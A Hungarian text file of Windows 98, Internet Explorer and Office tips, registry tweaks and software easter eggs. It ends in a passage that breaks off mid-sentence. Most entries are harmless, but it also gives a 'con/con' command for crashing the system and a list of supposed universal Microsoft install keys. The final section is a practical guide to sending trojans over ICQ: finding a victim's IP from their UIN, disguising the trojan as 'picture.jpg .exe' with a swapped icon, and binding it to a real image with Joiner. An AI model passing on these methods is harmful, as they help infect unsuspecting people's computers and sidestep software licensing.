Windows 98-ban üdvözlés: Csinálj egy parancsikont, ami a következõ helyre

win98.TXT Windows 98 tippek, trükkök, hibák és érdekességek: -------------------------------------------------------------------------------A Windows újraindítása gyorsan: Válaszd a Kikapcsolás/Kilép a rendszerből, de ne nyomj még Ok-t. Nyomd le a Sh ift billentyűt és Most Ok, miközben nyomod a Shiftet. Így csak a Windows fog újra indulni. -------------------------------------------------------------------------------A Registry újratöltése, újraindítás nélkül: Nyomj CTRL+ALT+DEL -t válaszd ki a Explorer-t . Feladat bezárása -> Mégse . Majd egy idő után előjön egy panel, ott ismét End Task (Feladat bezárása) -------------------------------------------------------------------------------A bejelentkezési és a kikapcsolási kép megváltoztatása: Ez a csapból is folyik, de itt is meg kell hogy legyen. C:\logo.sys Kezdõ képe rnyõ; C:\Windows\logos.sys; logow.sys a kilépõ két képernyõ. Csi nálj egy *.bmp-t, nevezd át *.sys-re, és másold át oda ahova szertnéd, ill amelyik ké pet ki akarods cserélni. Én azt ajánlom, hogy fogj egy 640x480-képet, aztán Paintben "nyomd össze" 320x400-ra, és így pont be tudod illeszteni. Kikapcsolásnál 640x480-ná visszaalakítja. 256 színnél többet ne használjunk. -------------------------------------------------------------------------------Windows 98-ban üdvözlés: Csinálj egy parancsikont, ami a következõ helyre mutat: "C:\Windows\ApplicationData\Microsoft\WELCOME\WELDATA.EXE You_are_a_real_rascal" (idé zõjelek nélkül). Indítsd el a parancsikont! (ha nem a Windows a Windowsod mapp ája, azt írd a Windows helyére!) -------------------------------------------------------------------------------Ikonáradat: Egy halom ikon található a Windows mappád progman.exe, és moricons.dll-jében, valamin t a windows\system mappában található pifmgr.dll fáljban. -------------------------------------------------------------------------------Az idõmérõ megállítása az Aknakeresõben: Az Aknakeresõben kattints egyszerre mind a két gombbal az idõmérõ ;re, és nyomj Esc-et! Mindezt gyorsan! -------------------------------------------------------------------------------Vezérlõpult és társai, mint mappák: Készíts egy új mappát, melynek neve legyen: "valami.{hosszú-kód}". Idézõjel ne m kell, a "valami" helyére bármit írhatsz, a hosszú kód pedig attól függ, mit akarsz mappaként megjeleníteni: {208D2C60-3AEA-1069-A2D7-08002B30309D} - Hálózatok (ez csak egy normál mappa, a Hálózatok ikonjával) {3DC7A020-0ACD-11CF-A9BB-00AA004AE837} Int ernet Explorer (mûködik) {871C5380-42A0-1069-A2EA-08002B30309D} Internet Expl orer (csak link, és hol az IE ikonja?) {645FF040-5081-101B-9F08-00AA002F954E} - Lomtá r (mûködik) {2227A280-3AEA-1069-A2DE-08002B30309D} - Nyomtatók (mûködik) {20D04FE0-3AEA-1069-A2D8-08002B30309D} - Sajátgép (ez csak egy normál mappa, a Sajátg ép ikonjával) {85BBD920-42A0-1069-A2E4-08002B30309D} - Táska (mûködik) {A4D9274 0-67CD-11CF-96F2-00AA00A11DD9} - Telefonos hálózat (nem mûködik) {D6277990-4C6A -11CF-8D87-00AA0060F5BF} - Ütemezett feladatok (mûködik) {21EC2020-3AEA-1069-A2 DD-08002B30309D} - Vezérlõpult (mûködik) Természetesen így a Start Menüb e is felvehetjük õket, mint kiugró menüket. -------------------------------------------------------------------------------Híres vulkánok nevei képernyõkímélnõnek: Screen Savernek a 3D Texetet (3D Szöveg) válasszuk, és a szöveg "volcano" legyen (idé zõjelek nélkül). Ezek után a képernyõn híres vulkánok nevét látjuk majd . -------------------------------------------------------------------------------Start menü bug: Klikk a Startra, Beállítások, majd Start menü, és Tálca beállításai. Klikk a Start Me nü Programjai fülre, ott pedig a Speciálisra. A címsávba írd be, hogy "C:\" (idéz&oti lde;jelek nélkül). Nyomj Entert, és nézd meg az üzenetet! 1. oldal

win98.TXT -------------------------------------------------------------------------------Titkos Admirális játszmák: Indítsd el az Admirálist. Nyomj F3-at, és írj "-1"-et vagy "-2"-õt, idéz&otild e;jelek nélkül. Klikk az OK-ra. -------------------------------------------------------------------------------Imaging for Windows 98 stáblista: Súgó/Névjegy. A feljövõ ablakban kattints az információ gombra. Majd írd be (n em fogod látni a betûket): "soup is a good food" (idézõjelek nélkül). -------------------------------------------------------------------------------Windows 98 SE-ben üdvözlés: Menj a Start/Beállítások/Vezérlõpult-ba. Klikkelj duplán a Területi beállítások (Földgömb) ikonra. Nyomd le, és tartsd lenyomva a Ctrl billentyût. Használd a térképen az egeredet! (Nézd meg a jobb oldalon lév&otild e; képet!) Klikkelj az 1-es pontra (Kairó), és a bal egérgombot nyomvatartva húzd el a 2. pontra (Memphis). Engedd el az egérgombot és kattints ismét a 2. pontra, megint tartsd lenyomva a bal egérgombot, és közben húzd el a 3. pontra (Redmond). Engedd el a gombot. Figyeld a képeket és a zenét! -------------------------------------------------------------------------------Windows 98 hiba 1: Az Asztalon klikkelj az egered jobb gombjával, válaszd az Újat, és ott a Parancsikont . A megnyílt ablak baloldalán, ha megfigyeled a képet: olvashatatlan a Start felirat, és felette függõleges írással az olvashatod, hogy Windows95! -------------------------------------------------------------------------------Windows 98 hiba 2: Az Asztalon klikkelj az egered jobb gombjával, és válaszd az Újat, és ott a Parancsik ont. Ezután a megnyíló ablakban kattints a Mégsére. Ezt ismételd meg még 2-3-szor. Ha sikerült, láthatod, hogy kb. harmadikra az "Új" menüpontra már üres menü nyilik meg! -------------------------------------------------------------------------------Windows 98 Kék Halál: Válaszd a Start menüt, Futtatás és írd be: "con/con". Kék Halált okoz, lefagy a rends zer! Ne probáld ki internetkapcsolatban! -------------------------------------------------------------------------------Win98 rejtényes Tálca menü: Tartsd nyomva a Ctrl-t. Válaszd a Start menü/Beállitások/Tálca és Start menü...-t. Má ris ott egy harmadik fül: DeskBar beállításai, ami üres! -------------------------------------------------------------------------------Imaging for Windows (98) stáblista: Súgó/Névjegy. A feljövõ ablakban kattints az Információ gombra. Majd írd be (n em fogod látni a betûket): "soup is a good food" (idézõjelek nélkül). Az autorun kiiktatása: Ha van egy autorunos CD-nk, és nem szeretnénk, hogy betöltõ ;djön, nyomjuk folyamatosan a SHIFT billentyût, mikor becsukjuk a CD tálcáját. Egy másik lehetõség fölinstallálni a TWEAKUI programot, ami a Win98 CD-jén tal álható. Telepítése: jobb click a TOOLS\RESKIT\POWERTOY könyvtárban lévo tweakui.inf-r e, és install. Kattintsunk a Start -> Settings -> Control Panel-ben a Tweak UI ikonra . Kattinktsunk a Paranoia fülre, és "unpipáljuk" a Play data CDs automatically-t. Aki még az audio CD-k automatikus lejátszását is tilltani akarja, az "unpipálja" a Play a udio CDs automatically-t is. -------------------------------------------------------------------------------Program, ami kikapcsolja az egész gépet: Ehhez nem kell program, csak egy parancsikon, ami az alábbi utasítást tartalmazza: C: \WINDOWS\RUNDLL.EXE user.exe,exitwindows Ez ugyan csak a Windows-t lépteti ki, de azz al kikapcsol a gép is (persze csak ATX esetén). -------------------------------------------------------------------------------Program, ami újraindítja a Windowst: Parancsikon, ami az alábbi utasítást tartalmazza: C:\WINDOWS\RUNDLL.EXE user.exe,exit windowsexec -------------------------------------------------------------------------------2. oldal

win98.TXT Hogyan kell törölni a parancsikon-nyilakat: Start Menü -> Beállítások -> Vezérlõpult -> Képernyõ -> Megjelenítés, a z elem mezõben megkeresed az "Ikon" nevû sort és kijelölöd, majd a melle tte aktívvá vált ablakban a 32-es értéket 30-ra állítod, végül az OK gomb. Ennyi, és még gépet sem kell újraindítani! -------------------------------------------------------------------------------A Start menü billentyûrõl való elõhívása: CTRL+ESC billentyû. -------------------------------------------------------------------------------Keresés, ha a menüpont le van tiltva a Start menüben: Kattints a bal gombbal a Tálca egy szabad részére vagy az Asztalra, majd nyomd meg az F3-at. -------------------------------------------------------------------------------Az Asztal újratöltése (Frissítés): Kattints a bal gombbal az Asztalra, majd nyomd meg az F5-öt. -------------------------------------------------------------------------------Gyors *.bmp nézegetés: Nevezd át *.ico vagy *.cur formátumra, és láss csodát... -------------------------------------------------------------------------------Telefonos hálózat "gyorsítás": Keresd meg a Telefonos hálózatot (Sajátgép/Telefonos hálózat). Indíts el egy Csatlako zást. Nyomd le, és tartsd lenyomva az Entert. Figyeld az ikont! -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------Windows 95/98 Registry: -------------------------------------------------------------------------------Kezdõdik a Dolog... Egyenlõre csak Windows 95/98. Figyelem! Ha esetleg nincs ott egy olyan bejegyzés, amit épp itt látsz, és amit módos ítani kén, akkor nem kell megjedni, csinálj egyet. Jobbklikk, Új Kulcs/Karakterlánc.. . Vagy ami épp oda van írva. Ez 3 fajta lehet : Type (Tipus): (Jobb klikk után) - Key -> Kulcs (még egy "könyvtár" a bal oldalon) (A Jobb oldalon lehet ezeket létrehozni:) - String -> Karakterlánc (REG_SZ) - Binary -> Bináris Érték - DWORD -> 32 bites érték (REG_DWORD) Kezdjük: Hogyan használjam a következõ sorokat ? Elég primitíven írom le, de kérlek néz d el, mert igyekszem ezt úgy leírni, hogy mindenki tudja használni. -------------------------------------------------------------------------------Ki és bekepcsolása a CD-ROM automatikus indításának (Autostart): Key: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CDRom] Ez azt jelenti, hog y a bal oldali részen (a regeditben) kattints addig, amíg el nem éred a megadott "hel yet" (hasonlóan, mint az intézõben) Value Name: Autorun Data Ezt a "szöveget" kell létrehoznod a jobb oldali részen olyan névvel, ami meg van adva a Value Name mög ött (jelen esetben Autorun Data), egy jobb klikk segítségével, majd válaszd ki a mega dott Type-t (jelen esetben a REG_DWORD és ahogy látod ez 32 bites értéket jelent (a m agyar Windows-ban), ez egy pár sorral feljebb van leírva.) Type: REG_DWORD Data: (0=d isable, 1=enable) Ez azt jelenti, hogy milyen értéket kell megadnod neki (általában k ét választásod van 0 vagy 1) ezt úgy tudod beadni, hogy kettõt rákattintassz a létrehozott Type változóra. -------------------------------------------------------------------------------PC Speaker sípolása error esetén: Key: [HKEY_CURRENT_USER\Control Panel\Sound] Value Name: Beep Data Type: REG_SZ (A RE G_SZ Karakterláncot jelent) Data: 'Yes' or 'No' 3. oldal

win98.TXT -------------------------------------------------------------------------------IntelliMouse Scroll funkció: Key: [HKEY_CURRENT_USER\Control Panel\Desktop] Value Name: WheelScrollLines Data Type : REG_SZ Data: 0 - 0xFFFFFFFF A Data értékét lehet változtatni, annak fejében, hogy h ány sort akarok görgetni a görgõ segítségével. Ha Data=0 akkor nem mozdul, ha Data=0xFFFFFFF akkor maximális. -------------------------------------------------------------------------------Az Internet Explorer animációs logojának kiiktatása: Key: [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar] Itt töröld ki a "BrandBitmap" és a "SmBrandBitmap" bejegyzéseket -------------------------------------------------------------------------------Az Internet Explorer gombsor alatti képének kicserélése(!): Key: [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar] Value Name: Bac kBitmap Data Type: REG_SZ Csináld meg ezt a plusz értéket (BackBitmap) a megadott elé tési úton, és add meg értéknek pl: "C:\WINDOWS\CLOUDS.BMP" -------------------------------------------------------------------------------Az Internet Explorer ikon eltüntetése Win 98 alatt a desktopról: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Value Name: NoInternetIcon Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled) -------------------------------------------------------------------------------Az Internet Explorer ablakmegnevezésének (Window Title) átnevezése: Key: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] Value Name: Windo w Title Data Type: REG_SZ Szóval pl: Ne Internet Explorer legyen, hanem pl: Sexplorer Csinálj egy új "Windows Title" bejegyzést. Változtasd meg a Szöveget, írj be neki aká r mit, Töröld le az eredeti "Windows title" bejegyzést. -------------------------------------------------------------------------------Plusz jobb klikk opció, ill. futtatási lehetõség: Key: [HKEY_CLASSES_ROOT\Directory\shell] Itt értelemszerûen adj hozzá, vagy Sze rkeszd át. -------------------------------------------------------------------------------A Windows 9x install könyvtárának megváltoztatása: Key: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup] Value Name: SourcePath Data Type: REG_SZ Data: D:\WIN95 Bár nekem még soha nem kellett... -------------------------------------------------------------------------------A Start menü "futási" ideje, amíg elõjön: Key: [HKEY_CURRENT_USER\Control Panel\Desktop] Value Name: MenuShowDelay Data Type: R EG_SZ Data: 0-999 (milliseconds) -------------------------------------------------------------------------------Windows animáció be és kikapcsolása: Key: [HKEY_CURRENT_USER\Control Panel\Desktop] Value Name: MinAnimate Data Type: REG_ SZ Data: (0=disable, 1=enable) -------------------------------------------------------------------------------Az ablakok Smooth Scrolling funkciója: Key: [HKEY_CURRENT_USER\Control Panel\Desktop] Value Name: SmoothScroll Data Type: RE G_BINARY Data: (00 00 00 00 = disabled, 01 00 00 00 = enabled) -------------------------------------------------------------------------------Az MS-DOS Command Promt (Parancssor) kikapcsolása: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp] Value Name: Disabled Data Type: REG_DWORD Data: (0 = disable, 1 = enable) 4. oldal

win98.TXT -------------------------------------------------------------------------------Az MS-DOS programok futtatásának letiltása Windows alatt: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp] Value Name: NoRealMode Data Type: REG_DWORD Data: (0 = disable, 1 = enable) -------------------------------------------------------------------------------Egy plusz bejelentkezõ dialógus ablak megjelentetése a Windows elindításakor: Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon Value Name : LegalNoticeCaption, LegalNoticeText Data Type: REG_SZ Csináld meg a két bejegyzést (LegalNoticeCaption - megjelenõ ablak címe, LegalNoticeText Data - a szöveg) E zekbe bármilyen szöveget beleírhatsz. -------------------------------------------------------------------------------A Leállítás menüpont kiiktatása a Start menübõl: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Value Name: NoClose Data Type: REG_DWORD Data: (0 = shutdown enabled, 1 = shutdown di sabled) -------------------------------------------------------------------------------Common programcsoport kiiktatása a Start menübõl: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Value Name: NoCommonGroups Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled) -------------------------------------------------------------------------------Minden elem eltüntetése az Asztalról: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Value Name: NoDesktop Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled) -------------------------------------------------------------------------------A Sajátgép eltüntetése az Asztalról: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Value Name: NoDrives Data Type: REG_DWORD Attól függ, hogy mit akarsz eltüntetni az é rtéke: A: 1, B: 2, C: 4, D: 8, E: 16, F: 32, G: 64, H: 128, I: 256, J: 512, K: 1024, L: 2048, M: 4096, N: 8192, O: 16384, P: 32768, Q: 65536, R: 131072, S: 262144, T: 524 288, U: 1048576, V: 2097152, W: 4194304, X: 8388608, Y: 16777216, Z: 33554432, Minden partíció és flopy eltüntetése: 67108863 -------------------------------------------------------------------------------Kedvencek eltüntetése a Start menübõl: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Value Name: NoFavoritesMenu Data Type: REG_DWORD Data: (0=disable, 1=enable) -------------------------------------------------------------------------------A Keresés menüpont eltüntetése a Start menübõl: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Value Name: NoFind Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled) -------------------------------------------------------------------------------A Dokumentumok menüpont eltüntetése a Start menübõl: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Value Name: NoRecentDocsMenu Data Type: REG_DWORD Data: (0=disable, 1=enable) -------------------------------------------------------------------------------A Futtatás menüpont eltüntetése a Start menübõl: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Value Name: NoRun Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled) -------------------------------------------------------------------------------A Folders beállítások eltüntetése: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 5. oldal

win98.TXT Value Name: NoSetFolders Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled) -------------------------------------------------------------------------------A Tálca beállításainak eltüntetése: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Value Name: NoSetTaskbar Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled) -------------------------------------------------------------------------------A Network beállítási panel eltüntetése: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network] V alue Name: NoNetSetup Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled) -------------------------------------------------------------------------------A Nyomtatók beállítás panel eltüntetése: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Value Name: NoPrinters Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled) -------------------------------------------------------------------------------A Képernyõ - Megjelenés fül elrejtése: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] Va lue Name: NoDispAppearancePage Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled) -------------------------------------------------------------------------------A Képernyõ - Háttér fül elrejtése: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] Va lue Name: NoDispBackgroundPage Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled) -------------------------------------------------------------------------------A Képernyõ - Képernyõkímélõ fül elrejtés: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] Va lue Name: NoDispScrSavPage Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled) -------------------------------------------------------------------------------A Képernyõ - Beállítások fül elrejtés: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] Va lue Name: NoDispSettingsPage Data Type: REG_DWORD Data: (0 = disabled, 1 = enabled) -------------------------------------------------------------------------------Hi-Color ikonok: Key: [HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics] Value Name: Shell Icon B PP Data Type: REG_SZ Data: 16 -------------------------------------------------------------------------------Új tippek a Windows napi tippekhez: Key: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Tips] Dat a Type: REG_SZ Ezek után akármennyi tippet létre tudsz hozni ... -------------------------------------------------------------------------------Automatikus program elindulás a Windows indításakor: Key: [HKEY_LOCAL_MACHINE\SOFTWAR E\Microsoft\Windows\CurrentVersion\Run] Data Type: REG_SZ Itt is hozz létre plusz bej egyzéseket, és kész is. -------------------------------------------------------------------------------Az alap Cég és Név információ megváltoztatás: Key: [HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info] Data Type: REG_ SZ -------------------------------------------------------------------------------6. oldal

win98.TXT Az ikonok eltüntetése az Asztalról: Key: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\N ameSpace] -------------------------------------------------------------------------------A Lomtár eltüntetése vagy átnevezése: Key: [HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder] Val ue Name: Attributes Data Type: REG_BINARY Data: (70 01 00 20=enable, 40 01 00 20=defa ult) Ha default akkor nem lehet változtatni, ha enable, akkor lehet átírni, törölni:- ) -------------------------------------------------------------------------------A "Click here to Start/Az indításhoz kattintson ide" szöveg kikapcsolása: Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Value Name: NoStartBanner Data Type: REG_BINARY Data: (00 00 00 00 = disabled, 01 00 00 00 = enabled) -------------------------------------------------------------------------------Hogyan csináljunk a Velocity (100) videókártyából 3dfx Voodoo III-at egyszerûen : Forrás: Internetland Key: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class \Display\0000\Glide] (A 0000 a videokártya sorszámát jelöli, tehát ha több is van vag y volt, akkor a Velocityt talán a 0001 vagy 0002 alatt találjuk meg, stb...) Value Na me: FX_GLIDE_NUM_TMU Data Type: REG_SZ Data: 2 Ezután indítsuk újra a gépet, majd vid eókártyánk majdnem olyan multitexturinget használ, mint nagyobb testvére, a Voodoo II I! -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------Microsoft Internet Explorer tippek, trükkök, hibák és érdekességek: -------------------------------------------------------------------------------Régi és új IE: Ha ki akarjuk próbálni az IE 5-öt, anélkül, hogy megválnánk a 4-estõl, akkor a z Explorer 5 telepítõjében menjünk a Custom Installationbe, és kattintsunk az Advanced fülre. Ezek után 3 választási lehetõségünk van, melyek közül egy pont nekünk való. Válasszuk ki, és telepítsük fel így az új böngészõt! -------------------------------------------------------------------------------Internet Explorer 4: Nézd meg a névjegyet! Tartsd a Ctrl-t nyomva, és húzd el az E-vel az Intenet Explorer feliratot, alatta lesz egy gomb. Klikk a gombra, majd újra fogd meg at E-t, és tedd a Föld közepére! -------------------------------------------------------------------------------Internet Explorer 5.0 stáblista: Nyiss egy jegyzettömböt. Írd be: "" (idézõjelek nélkül) Mentsd el fájlként: "t est.htm". Nyisd meg a test.htm-et IE 5-ben. -------------------------------------------------------------------------------Internet Explorer 5 Godzilla: Nyisd meg az IE 5-öt. Válaszd a felsõ menüsorból az Eszközöket, utána Internet -beállítások. A megjelenõ menüben, alul válaszd a Nyelvek-et. Hozzáadás, írd b e: "ie-ee" (idézõjelek nélkül), és OK. Klikkelj a Felhasználó által létrehozot t "ie-ee"-re, és nyomd meg a Fel gombot, majd OK. Most a IE 5-ben a Keresés gombra ka ttints, és a megjelenõ oldalsó ablakban a Testreszabásra. Íme, Godzilla feltör neked egy húsvéti tojást. --------------------------------------------------------------------------------------------------------------------------------------------------------------7. oldal

win98.TXT Internet Explorer 5-ben kék kezdõképernyõ: Nyiss meg egy IE 5 ablakot. Eszközök/Internet-beállítások. A kezõlapnál a címh ez írd be: "about:Mozilla" (idézõjelek nélkül). A kezdõ IE 5 ablak kék színû lesz. -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------Microsoft Office 97/2000 tippek, trükkök, hibák és érdekességek: -------------------------------------------------------------------------------Microsoft irodai termékek telepítési mastercodeja: Szinte bármely Microfos irodai termékhez (Office, Visual Basic, stb.) jók ezek a tele pítési kódok: 0001-0000000, 1112-1111111, 1234-5678900, 1234-5678901, 1234-5678902, 1 234-5678903, 1234-5678904, 1234-5678905, 1234-5678906, 1234-5678907, 1234-5678908, 12 34-5678909. -------------------------------------------------------------------------------Word 97 flipper: Nyiss egy új dokumentumot. Írd be: "Blue" (idézõjelek nélkül). Jelöld ki, és v álaszd a Formátum/Betûtípust. A betûtípus legyen félkövér és a színe legy en kék. Klikkelj az OK-ra. Rakj egy szóközt Blue szó után. Válaszd a Súgót és a Névje gyet. Tartsd nyomva a Ctrl-t és a Shiftet, és az egér bal gombjával klikkelj a Word l ogóra (kiegészítés: a Ctrl+Shift nyomvatartása nem szükséges, anélkül is megy). Flipp er gombok: a "Z" a bal és az "M" a jobb flipper kar. Kilépni az Esc-pel tudsz. -------------------------------------------------------------------------------Word 97 kiakasztása: Nyiss egy új dokumentumot. Az Eszközök/Beállítások/Helyesírásnál ellenõrizd, h ogy a Helyesírás-ellenõrzés beíráskor és a Nyelvhelyesség ellenõrzése b eíráskor be legyen kapcsolva. Kattint az OK-ra. A dokumentumba írd be: "édesapáméké", vagy azt hogy: "bácsiék", és utána nyomd meg az Entert. Ha mindent jól csináltál, jut almad egy pár hibaüzenet. -------------------------------------------------------------------------------Excel 97 repülõszimulátor: Nyiss egy új munkalapot, és nyomd meg az F5-öt. Írd be: "X97:L97" (idézõjelek nélkül) és nyomj Entert. Nyomd meg a Tab gombot, tartsd nyomva a Ctrl-t és a Shiftet, és klikkelj a DiagramVarázsló ikonra. Használd az egeret a mozgáshoz, a bal gomb az e lõre menet és a jobb gomb a hátra. Kilépni az Esc-pel tudsz. Keress egy táblát a területen! Ezen láthatod a készítõk nevét, stb... -------------------------------------------------------------------------------PocketExcel intro (PalmTopokban): El kell menni a PocketExcelben az AA oszlop 1000-dik cellájára, és beírni: "credits" (idézõjelek nélkül). Szinte minden Palmnél mûködik. -------------------------------------------------------------------------------Word 2000 stáblista: Nyomd meg az F1-et. A "Mit szeretne tudni?" kérdés alá írd be: "Cast" (idézõje lek nélkül). Klikkelj a Keresésre. Válaszd az elsõ sort, a Microsoft Office 20 00 felhasználói támogató csapatot. A megjelenõ ablakban klikkelj a kis képre! Láthatod a stáblistát. -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------Tippek, trükkök, hibák és érdekességek egyéb programokban: -------------------------------------------------------------------------------WinRAR 2.50 (és feljebb): Válaszd a Help menüt. Válaszd az About WinRAR gombot. 8. oldal

win98.TXT Klikkelj a könyvekre, és azok l eesnek (még pattanak is). -------------------------------------------------------------------------------Adobe PhotoShop 4 hu: Lenyomott Alt billentyû mellett kattints a Súgóra, és válaszd az A PhotoShopról menüt. Megjelenik a Big Electric Cat címû kép és egy alul srollozódó szöveg. -------------------------------------------------------------------------------Adobe PhotoShop 5: Kattints a Helpre. Tartsd nyomva az Alt+Shift billentyût, és kattints az About PhotoShop menüpontra. Megjelenik a Strange Cargo címû kép. -------------------------------------------------------------------------------AutoCad R14: A Help menüben válaszd az About pontot. Nyomd le a Ctrl és Shift billentyûket é s kattints kétszer a képre. Megjelennkk a készítõk képei, és a neveik srollozn ak. -------------------------------------------------------------------------------Corel Draw! 4/5: A Help menüben válaszd az About Corel Draw! pontot. A megjelenõ képernyõ ;n kattints rá kétszer a bal felsõ sarokban a hõlégballonra. Lenyomott bal egérgombbal mozgasd fel-le a megjelenõ ballont. Kattints jobb egér gombbal néhányszor. Elvis figurák fognak ejtõernyõzni az égbõl. -------------------------------------------------------------------------------Corel PhotoPaint 6: A Help menüben válaszd az About pontot. Tartsd lenyomva a Crtl+Alt billentyût, amíg felvillan a kép. Tartsd lenyomva a Crtl+Shift billentyût a ballonon, és me gjelenik Elvis. Tartsd lenyomva a Crtl+Alt billentyût a ballonon, és megnézhete d a tüzijátékot. -------------------------------------------------------------------------------Corel PhotoPaint 7: Menj a Help menübe. Kattints kétszer a PhotoPaint emblémára. C++: A Help menüben válaszd az About pontot. Nyomd meg az Alt+I gombokat. C++ 4.51: A Help menüben válaszd az About pontot. Tartsd lenyomva a Ctrl-t, és kattints kett&ot ilde;t a Borland logóra. C++ 4.5 (és feljebb): A Help menüben válaszd az About pontot. Tartsd lenyomva a Ctrl+Shift-et, és kattints kettõt az ikon bal felsõ sarkára. -------------------------------------------------------------------------------Norton Antivirus 95: A Help menüben válaszd az About pontot. Tartsd lenyomva sokáig az N, A, V, billenty&u circ;ket. Megjelenik a NAV Team. ESC-pel zárd be. -------------------------------------------------------------------------------Norton Commander 95: A Help menüben válaszd az About pontot. Nyomd le a Ctrl-t és kattints kétszer az ikon ra. Megjelenik egy nagy kép a készítõ csapatról. -------------------------------------------------------------------------------WinAmp 2.23: A WinAmpben a macskás képet úgy lehet elõcsalni, hogy bepötyögöd (szép komótos an, az L-lek után Esc-et nyomva): "nullsoft" (idézõjelek nélkül). Megváltozik fölül a felirat (néhány skinnél más-más feliratok), és a képet a Creditsnél lehet meg tekinteni (várni kell egy kicsit, és erõsen pixeles). -------------------------------------------------------------------------------A Tapilap rejtett rovata: A McDonald'sokban lévõ tapilapon bökjünk a bohóc orrára (a Szerkesztõsé g menüben, a jobb oldalon). Megjelenik egy billentyûzet, pötyögjük be: "1968" ( idézõjelek nélkül). Voilá, gyönyörködhetünk az egyik készítõ gyermekkor i fotóiban. --------------------------------------------------------------------------------------------------------------------------------------------------------------Trójai programok küldése ICQ-n: -------------------------------------------------------------------------------9. oldal

win98.TXT Az ICQ - aki még nem tudná - egy igen kedvelt és elterjedt üzenetküldõ/chatel& otilde; program. Mindenkinek van egy ICQ UIN-je (User Identifier Number = felhasználó azonosító szám). Hogy ez mire jó? Ebbõl egy ICQ Sniffer, vagy az ICQ 2000: UIN To IP Converter nevû progi meg tudja mondani a célszemély IP-jét. Eddig ok, de még nincs nála e lindítva a trójai. Na igen, itt jön az elsõ trükk. Mert a hülye átnevezi a trójai szervert pl. ga me.exe-nek, de a célszemély nem olyan hülye, hogy vírusvizsgálat nélkül elindítsa. Le het valami filefertõzõ progit használni, de egy exe-t akkor sem fog gya nakvás nélkül elindítani, hacsak nem nagyon lamer. De! Fogjuk a trojan szervert, és nevezzük át pl. 'picture.jpg .exe' névre. Mikor látj a, hogy filet küldünk neki, a srác csak picture.jpg-t fog látni. Fogadja, és ha a win je nem írja ki a kiterjesztéseket, akkor késõbb is csak jpg-t lát és elindítja . Ám ezt a módszert senki sem szívja be, hogyha a trójai szerver ikonja nem olyan, mint a '.jpg' filoké. Szerencsére azonban egyszerû ikoncserlõ progival meg le het oldani a problémát - én a Microangelo-t javaslom, amit a http://www.impactsoft.co m/ címen találsz. Ám mindezek ellenére a legjobb megoldás (és jóval egszerûbb is), hogy használju k a Joiner 1.5 nevû progit, ami a trójai szervert akár kép, hang, video fájllal is tudja társítani. Sõt! Ennek is le lehet cserélni az ikonját, és mikor lefut tatja, még a kép is megjelenik neki... egyszóval a 